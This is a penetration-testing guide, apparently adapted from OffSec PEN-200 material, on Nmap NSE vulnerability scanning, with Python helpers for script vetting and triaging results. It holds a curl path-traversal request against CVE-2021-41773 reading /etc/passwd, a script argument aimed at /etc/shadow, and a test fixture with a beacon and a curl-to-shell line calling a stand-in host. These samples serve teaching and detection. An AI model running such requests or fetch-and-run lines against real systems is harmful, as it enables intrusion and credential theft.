Vulnerability Scanning with Nmap¶
Note: This guide is based on OffSec PEN-200 (OSCP) training materials, adapted and rephrased for educational purposes.
Table of Contents¶
- Introduction
- NSE Overview
- NSE Vulnerability Scripts
- Custom NSE Scripts
- Practical Scanning Techniques
- Best Practices
- Common Scripts Reference
- Troubleshooting
Introduction¶
The Nmap Scripting Engine (NSE) transforms Nmap from a port scanner into a lightweight vulnerability scanner. While less comprehensive than dedicated tools like Nessus, NSE excels at quick verification and targeted assessments.
Advantages:
- Pre-installed on most security distributions
- Fast and lightweight
- Highly customizable
- No licensing costs
- Active community

Limitations:
- Smaller vulnerability database
- Manual script management required
- Limited reporting features
- No patch recommendations

Use Cases:
1. Quick CVE verification
2. Confirming other tools' findings
3. Lightweight scanning when a full scanner is unavailable
4. Targeted service assessment
5. Custom detection logic
NSE Overview¶
Script Categories¶
NSE scripts are organized by function and risk level:
| Category | Risk | Purpose |
|---|---|---|
| safe | Low | No stability impact |
| intrusive | High | May crash services |
| vuln | Low-Med | Vulnerability detection |
| exploit | Very High | Active exploitation |
| dos | Critical | DoS testing |
| auth | Low-Med | Authentication testing |
| brute | Med-High | Password attacks |
| discovery | Low | Network discovery |
| malware | Low | Malware detection |
Important: Scripts can have multiple categories (e.g., intrusive,vuln).
Script Locations¶
```bash
# Script directory: /usr/share/nmap/scripts/
# Script database:  /usr/share/nmap/scripts/script.db
# (one Lua "Entry { filename = ..., categories = { ... } }" line per script)

# List all vuln scripts (categories are stored as quoted strings)
grep '"vuln"' /usr/share/nmap/scripts/script.db

# Count total scripts
ls /usr/share/nmap/scripts/*.nse | wc -l
```
NSE Vulnerability Scripts¶
The Vuln Category¶
Scripts in the vuln category detect vulnerabilities without necessarily exploiting them, but the vuln tag is not a safety guarantee: a script can be tagged vuln together with intrusive or exploit. Always check a script's full category list before running it (nmap --script-help <script> prints it, and script.db lists it for every installed script).
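The following pre-flight check is an added example (not part of the OffSec/PEN-200 material or the Nmap project). It parses script.db in the format Nmap writes it, lists the scripts that `--script "<category>"` would select, and ranks them with the risk table used in this guide and in Best Practices below; the SCRIPT_DB text is a constructed excerpt, not a copy of any installation's database.

```python
"""Pre-flight category check for NSE scripts (added example).

Parses Nmap's script.db (one `Entry { filename = "...", categories = { ... } }`
line per script), looks up the categories of every script a category selector
would run, and ranks them by the risk table from this guide.
"""
import re

# Constructed excerpt in script.db's format; on a real system read
# /usr/share/nmap/scripts/script.db instead.
SCRIPT_DB = """\
Entry { filename = "http-vuln-cve2017-5638.nse", categories = { "vuln", } }
Entry { filename = "smb-vuln-ms17-010.nse", categories = { "vuln", "safe", } }
Entry { filename = "http-slowloris.nse", categories = { "dos", "intrusive", } }
Entry { filename = "ssh-brute.nse", categories = { "brute", "intrusive", } }
Entry { filename = "ftp-anon.nse", categories = { "default", "auth", "safe", } }
Entry { filename = "http-shellshock.nse", categories = { "exploit", "vuln", "intrusive", } }
"""

# Risk levels from the guide's category table (higher = more dangerous).
RISK = {"safe": 0, "discovery": 0, "malware": 0, "auth": 1, "vuln": 1,
        "brute": 2, "intrusive": 3, "exploit": 4, "dos": 5}
RISK_LABEL = {0: "Low", 1: "Low-Med", 2: "Med-High", 3: "High",
              4: "Very High", 5: "Critical"}

ENTRY_RE = re.compile(r'filename\s*=\s*"([^"]+)".*?categories\s*=\s*\{([^}]*)\}')


def parse_script_db(text):
    """Return {script name without .nse: set of categories}."""
    db = {}
    for m in ENTRY_RE.finditer(text):
        name = m.group(1)
        if name.endswith(".nse"):
            name = name[:-4]
        db[name] = set(re.findall(r'"([^"]+)"', m.group(2)))
    return db


def script_risk(categories):
    """Risk level of one script. Nmap only tags a script 'safe' when it is not
    intrusive, so 'safe' wins; otherwise the most dangerous category counts.
    Unknown categories (e.g. 'default', 'version') count as Low-Med."""
    if "safe" in categories:
        return 0
    return max((RISK.get(c, 1) for c in categories), default=1)


def select(db, category):
    """Scripts that `nmap --script "<category>"` would run, riskiest first."""
    chosen = [(name, cats) for name, cats in db.items() if category in cats]
    return sorted(chosen, key=lambda nc: (-script_risk(nc[1]), nc[0]))


def preflight(db, category, max_level=1):
    """Split the selection into scripts at or below max_level (run as-is)
    and scripts above it (review the source / lab-test first)."""
    ok, review = [], []
    for name, cats in select(db, category):
        (ok if script_risk(cats) <= max_level else review).append(name)
    return ok, review


if __name__ == "__main__":
    db = parse_script_db(SCRIPT_DB)
    for name, cats in select(db, "vuln"):
        level = script_risk(cats)
        print(f"{RISK_LABEL[level]:10} {name:28} {','.join(sorted(cats))}")
    ok, review = preflight(db, "vuln")
    print("run as-is:", ok)
    print("needs review or lab test:", review)
```

Run it against a real database with `parse_script_db(open("/usr/share/nmap/scripts/script.db").read())`; anything that lands in the review list carries intrusive, exploit, brute or dos alongside vuln and should be reviewed or lab-tested before it touches a client system.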
The Vulners Script¶
vulners.nse is the most valuable NSE vulnerability script: it takes the CPE strings that version detection produces and queries the Vulners database (vulners.com) for known issues, so it needs both -sV and outbound access to the Vulners API.
Features:
- Provides CVE identifiers
- Includes CVSS scores
- Links to detailed information
- Marks entries that have a public exploit with *EXPLOIT*
- Requires the -sV flag
Basic Vulnerability Scan¶
The basic command (see the Quick Reference at the end of this page) combines:
- sudo: required for SYN scans (without root, Nmap falls back to a connect scan)
- -sV: service version detection (essential for vulners)
- -p <ports>: port specification
- --script "vuln": all vuln category scripts
Example: Web Server Scan¶
Sample Output:
```text
PORT    STATE SERVICE VERSION
443/tcp open  http    Apache httpd 2.4.49 ((Unix))
| vulners:
|   cpe:/a:apache:http_server:2.4.49:
|       CVE-2021-42013  7.5  https://vulners.com/cve/CVE-2021-42013
|       CVE-2021-41773  7.5  https://vulners.com/cve/CVE-2021-41773
|       *EXPLOIT*
```
Analyzing Results¶
- Priority 1: CVSS ≥ 7.0 (High/Critical)
- Priority 2: Marked with *EXPLOIT*
- Priority 3: Recent CVEs (current or previous year)
- Priority 4: Configuration issues and everything else
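The triage rules above, applied to a scan saved with -oX, as an added example (not part of the OffSec/PEN-200 material or the Nmap project). The XML below is a constructed sample in the shape vulners.nse writes its structured output (a `<table key="cpe...">` per CPE holding one `<table>` per entry with id, type, cvss and is_exploit elements); the ids and scores are illustrative and the element layout is an assumption you should confirm against your own -oX file.

```python
"""Triage vulners.nse findings from Nmap XML output (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV --script vulners -oX` output; the
# structure is an assumption, the ids/scores are illustrative only.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.49"/>
        <script id="vulners" output="(text output omitted)">
          <table key="cpe:/a:apache:http_server:2.4.49">
            <table>
              <elem key="id">CVE-2021-42013</elem><elem key="type">cve</elem>
              <elem key="cvss">7.5</elem><elem key="is_exploit">false</elem>
            </table>
            <table>
              <elem key="id">CVE-2021-41773</elem><elem key="type">cve</elem>
              <elem key="cvss">7.5</elem><elem key="is_exploit">false</elem>
            </table>
            <table>
              <elem key="id">EDB-ID:50383</elem><elem key="type">exploitdb</elem>
              <elem key="cvss">6.8</elem><elem key="is_exploit">true</elem>
            </table>
            <table>
              <elem key="id">CVE-2021-34798</elem><elem key="type">cve</elem>
              <elem key="cvss">5.0</elem><elem key="is_exploit">false</elem>
            </table>
            <table>
              <elem key="id">CVE-2017-9798</elem><elem key="type">cve</elem>
              <elem key="cvss">5.0</elem><elem key="is_exploit">false</elem>
            </table>
          </table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_vulners(xml_text):
    """Flatten every vulners entry into a dict with host/port/cpe context."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            for script in port.findall("script"):
                if script.get("id") != "vulners":
                    continue
                for cpe_table in script.findall("table"):
                    for entry in cpe_table.findall("table"):
                        fields = {e.get("key"): (e.text or "").strip()
                                  for e in entry.findall("elem")}
                        try:
                            cvss = float(fields.get("cvss", "0"))
                        except ValueError:
                            cvss = 0.0  # vulners sometimes has no score
                        findings.append({
                            "host": addr, "port": port.get("portid"),
                            "cpe": cpe_table.get("key"),
                            "id": fields.get("id", ""),
                            "type": fields.get("type", ""),
                            "cvss": cvss,
                            "exploit": fields.get("is_exploit", "false").lower() == "true",
                        })
    return findings


def cve_year(vuln_id):
    """Year from a CVE id, or None for non-CVE entries (EDB-ID, PACKETSTORM, ...)."""
    parts = vuln_id.split("-")
    if len(parts) >= 3 and parts[0] == "CVE" and parts[1].isdigit():
        return int(parts[1])
    return None


def priority(finding, ref_year):
    """The guide's four priority levels; ref_year is the year of the engagement."""
    if finding["cvss"] >= 7.0:
        return 1
    if finding["exploit"]:
        return 2
    year = cve_year(finding["id"])
    if year is not None and year >= ref_year - 1:
        return 3
    return 4


def triage(xml_text, ref_year):
    """Findings ordered by priority, then CVSS (desc), then id."""
    findings = parse_vulners(xml_text)
    for f in findings:
        f["priority"] = priority(f, ref_year)
    return sorted(findings, key=lambda f: (f["priority"], -f["cvss"], f["id"]))


if __name__ == "__main__":
    for f in triage(SAMPLE_XML, 2022):
        flag = "*EXPLOIT*" if f["exploit"] else ""
        print(f"P{f['priority']} {f['host']}:{f['port']} {f['id']:18} {f['cvss']:4} {flag}")
```

Replace SAMPLE_XML with `open("scan.xml").read()` for a real run. Note that vulners reports the score it has on record (CVSS v2 for many older entries), so a 7.5 here is not the same scale as an NVD v3 rating; treat the priority as an ordering for manual verification, not as a severity rating for the report.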
Custom NSE Scripts¶
Recent CVEs often require custom community-developed scripts.
Finding Scripts¶
Where to look (search for the CVE identifier together with "nse" or "nmap"):
- GitHub repositories
- Security researcher blogs
- Exploit-DB
- GitHub Gists
Security Verification¶
Before using custom scripts:

1. Source check:
   - Reputable author?
   - Repository has stars/activity?
   - User reviews present?
2. Code review: read the whole script. It runs with Nmap's privileges, which is root whenever you scan with sudo.
3. Test in a lab before the script touches a client or production host.

Red flags:
- Obfuscated code
- Hardcoded IPs
- External downloads
- File system writes
- Privilege escalation
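A first-pass checker for the red flags above, as an added example (not part of the OffSec/PEN-200 material or the Nmap project). It is a heuristic to point a reviewer at the suspicious lines of an .nse file; it does not replace reading the script. The SUSPECT_SCRIPT text is a constructed Lua fixture that mixes a legitimate request to the scanned host with the patterns the checklist warns about (the 198.51.100.7 address is a documentation address, not a real host).

```python
"""Static red-flag scan of an NSE (Lua) script before installation (added example)."""
import re

# Constructed fixture: a plausible-looking community vuln script with a
# legitimate check followed by the patterns a reviewer should reject.
SUSPECT_SCRIPT = """\
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"

description = [[Checks a web server for a path traversal (constructed test fixture)]]
categories = {"vuln", "safe"}

portrule = shortport.http

action = function(host, port)
  -- legitimate: the request goes to the scanned host and port
  local r = http.get(host, port, "/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd")
  -- red flags start here
  local beacon = http.get_url("http://198.51.100.7/collect?h=" .. host.ip)
  local f = io.open("/tmp/.nse-cache", "w")
  f:write(r.body)
  f:close()
  os.execute("curl -s http://198.51.100.7/x | sh")
  local fn = loadstring(string.char(112, 114, 105, 110, 116))
  return stdnse.format_output(true, ("status %s"):format(r.status))
end
"""

# (rule name, pattern). One finding per rule per line.
RULES = [
    ("hardcoded IP address",
     re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')),
    ("external URL literal (download or beacon)",
     re.compile(r'https?://[^\s"\']+')),
    ("file system write",
     re.compile(r'io\.open\s*\([^)]*,\s*"[wa]\+?b?"\s*\)|\bos\.remove\b|\bos\.rename\b')),
    ("command execution",
     re.compile(r'\bos\.execute\b|\bio\.popen\b')),
    ("dynamic code loading (obfuscation)",
     re.compile(r'\bloadstring\b|(?<![\w.])load\s*\(|\bstring\.char\s*\(')),
    ("long opaque literal (possible encoded payload)",
     re.compile(r'"[A-Za-z0-9+/=]{80,}"')),
]

# Anything in this set has no business in a detection-only vuln script.
REJECT_RULES = {"file system write", "command execution",
                "dynamic code loading (obfuscation)"}


def review_nse(lua_source):
    """Return [{line, rule, text}] for every line that trips a rule.
    Lua comment lines (--) are skipped."""
    findings = []
    for lineno, line in enumerate(lua_source.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("--"):
            continue
        for rule, pattern in RULES:
            if pattern.search(code):
                findings.append({"line": lineno, "rule": rule, "text": code})
    return findings


def verdict(findings):
    """'reject' on execution/loading/write, 'review' on IPs or URLs, else 'pass'."""
    rules = {f["rule"] for f in findings}
    if rules & REJECT_RULES:
        return "reject"
    if rules:
        return "review"
    return "pass"


if __name__ == "__main__":
    hits = review_nse(SUSPECT_SCRIPT)
    for h in hits:
        print(f"line {h['line']:3}  {h['rule']:45}  {h['text']}")
    print("verdict:", verdict(hits))
```

Feed a downloaded file with `review_nse(open("/tmp/<script>.nse").read())`. Expect false positives on the IP and URL rules (documentation links, loopback addresses in test tables); the point is that every hit gets a human look before `sudo cp` puts the script where root-run scans will load it.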
Installation Process¶
```bash
# 1. Download
wget -O /tmp/<script>.nse <url>
# 2. Review
cat /tmp/<script>.nse
# 3. Install
sudo cp /tmp/<script>.nse /usr/share/nmap/scripts/
# 4. Update database
sudo nmap --script-updatedb
# 5. Verify
nmap --script-help <script>
```
Naming Convention: <protocol>-vuln-<cve-or-name>.nse
Example: CVE-2021-41773 (Apache Path Traversal)¶
```bash
# Install script
sudo cp http-vuln-cve2021-41773.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb
# Run scan
sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" <target>
# Manual verification: the port is TLS, so use https:// (with -k for a self-signed
# cert); --path-as-is stops curl from normalising the dot segments client-side
curl -k --path-as-is "https://<target>:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
```
Practical Scanning Techniques¶
Single Target Scans¶
```bash
# All ports (slow)
sudo nmap -sV -p- --script "vuln" <target>
# Common ports (balanced)
sudo nmap -sV --script "vuln" <target>
# Specific ports (fast)
sudo nmap -sV -p 80,443 --script "vuln" <target>
```
Multiple Target Scans¶
```bash
# IP range
sudo nmap -sV -p 80,443 --script "vuln" 192.168.1.0/24
# Multiple targets (space-separated)
sudo nmap -sV -p 80,443 --script "vuln" <ip1> <ip2> <ip3>
# From file
sudo nmap -sV -p 80,443 --script "vuln" -iL targets.txt
```
Service-Specific Scans¶
```bash
# HTTP/HTTPS
sudo nmap -sV -p 80,443 --script "http-vuln-*" <target>
# SMB
sudo nmap -sV -p 445 --script "smb-vuln-*" <target>
# SSL/TLS
sudo nmap -sV -p 443 --script "ssl-*" <target>
# SSH
sudo nmap -sV -p 22 --script "ssh-*" <target>
```
Targeted CVE Scanning¶
```bash
# Using vulners
sudo nmap -sV -p 80,443 --script "vulners" <target> -oN scan.txt
# Specific CVE (with custom script)
sudo nmap -sV -p 8080 --script "http-vuln-cve2021-44228" <target>
```
Combined Features¶
```bash
# With aggressive timing
sudo nmap -sV -T4 -p 80,443 --script "vuln" <target>
# With OS detection
sudo nmap -sV -O -p 80,443 --script "vuln" <target>
# Default scripts plus vuln scripts (-sC is shorthand for --script=default,
# so name both categories instead of combining -sC with a second --script)
sudo nmap -sV -O -p 80,443 --script "default,vuln" <target>
# Save all formats (.nmap, .gnmap and .xml)
sudo nmap -sV -p 80,443 --script "vuln" <target> -oA scan_results
```
Best Practices¶
Safety Guidelines¶
Always check script categories before running a script. The combination of categories, not the vuln tag alone, determines the risk:

| Categories | Risk | Action |
|---|---|---|
| safe,vuln | Low | Generally safe |
| vuln | Medium | Review first |
| intrusive,vuln | High | Lab test |
| exploit | Very High | Controlled environments only |
| dos | Critical | Never in production |

Production rules:
- Use safe scripts only
- Test in staging first
- Schedule maintenance windows
- Notify administrators
- Monitor during execution
- Have rollback plans
Performance Optimization¶
```bash
# Faster scan
sudo nmap -sV -T4 --max-retries 1 --script "vuln" <target>
# More accurate
sudo nmap -sV -T2 --max-retries 3 --script "vuln" <target>
# Parallel hosts
sudo nmap -sV --script "vuln" --min-hostgroup 10 <range>
```
Script Arguments¶
```bash
# Custom User-Agent
sudo nmap --script "http-vuln-*" \
  --script-args http.useragent="<agent>" <target>
# Script timeout
sudo nmap --script "vuln" --script-timeout 300s <target>
# Specific script argument
sudo nmap --script "http-vuln-cve2021-41773" \
  --script-args http-vuln-cve2021-41773.file="/etc/shadow" <target>
```
When to Use Nmap vs Dedicated Scanners¶
Use Nmap for:
- Quick CVE verification
- Limited resources
- Verifying other tools' findings
- Targeted assessments
- Integration with workflows

Use dedicated scanners for:
- Comprehensive assessments
- Large enterprise networks
- Authenticated patch scanning
- Compliance requirements
- Detailed reporting

Recommended hybrid workflow:
1. Nmap port/service scan
2. Quick NSE vuln scan
3. Full Nessus scan
4. Nmap verification of critical findings
5. Manual testing
6. Exploitation/Reporting
Common Scripts Reference¶
HTTP Vulnerabilities¶
- http-vuln-cve2021-41773 - Apache 2.4.49 path traversal (custom script; see Custom NSE Scripts)
- http-vuln-cve2017-5638 - Apache Struts RCE
- http-shellshock - Bash Shellshock
- http-csrf - CSRF detection
- http-stored-xss - Stored XSS
SMB Vulnerabilities¶
- smb-vuln-ms17-010 - EternalBlue
- smb-vuln-ms08-067 - MS08-067
- smb-vuln-cve-2017-7494 - SambaCry
SSL/TLS Vulnerabilities¶
- ssl-heartbleed - Heartbleed
- ssl-poodle - POODLE
- ssl-ccs-injection - CCS injection
- sslv2-drown - DROWN attack
Other Services¶
- ftp-anon - Anonymous FTP
- ftp-vsftpd-backdoor - vsftpd backdoor
- mysql-vuln-cve2012-2122 - MySQL auth bypass
- ssh-brute - SSH brute force
Troubleshooting¶
Common Issues¶
Script Not Found: the .nse file is not in /usr/share/nmap/scripts/, or it was copied there without re-running sudo nmap --script-updatedb; confirm the name with nmap --script-help <script>.
No Vulners Results: vulners keys on the CPE from version detection, so the scan needs -sV; services Nmap cannot fingerprint produce no lookup, and the script also needs outbound access to the Vulners API.
Script Timeout: scripts that run too long against slow hosts or large port lists; set a limit with --script-timeout, narrow the port list, or use a slower -T template.
Permission Denied: SYN scans, -O and writing to /usr/share/nmap/scripts/ require root; run with sudo.
Debugging¶
```bash
# Basic debug
sudo nmap -d --script "vuln" <target>
# Detailed debug
sudo nmap -d2 --script "vuln" <target>
# Packet trace
sudo nmap --packet-trace --script "<script>" <target>
# Script trace
sudo nmap --script-trace --script "<script>" <target>
```
Quick Reference¶
Essential Commands¶
```bash
# Basic vuln scan
sudo nmap -sV -p <ports> --script "vuln" <target>
# Service-specific
sudo nmap -sV -p <port> --script "<service>-vuln-*" <target>
# Custom script
sudo cp <script>.nse /usr/share/nmap/scripts/ && sudo nmap --script-updatedb
# Targeted CVE
sudo nmap -sV -p <port> --script "<cve-script>" <target>
# Save results
sudo nmap -sV -p <ports> --script "vuln" <target> -oA results
```
Best Practices Checklist¶
- Always use -sV for service detection
- Check script categories before running
- Test custom scripts in a lab
- Review custom script code
- Use timing appropriate for the environment
- Coordinate with system owners
- Document all findings
- Manually verify results
- Save output
- Update scripts regularly
Summary¶
NSE provides effective lightweight vulnerability scanning capabilities within Nmap. While not as comprehensive as dedicated scanners, it excels at rapid verification and targeted assessments. The vulners script offers current CVE information, and custom scripts extend functionality for recent vulnerabilities.
Key Principles:
- Verify script categories for safety
- Use -sV; vulners depends on it
- Review custom scripts before use
- Manually confirm findings
- Combine with dedicated scanners for comprehensive coverage
- Understand the impact risk to target systems
NSE complements dedicated vulnerability scanners and belongs in every penetration tester's toolkit.
Content derived from OffSec PEN-200 courseware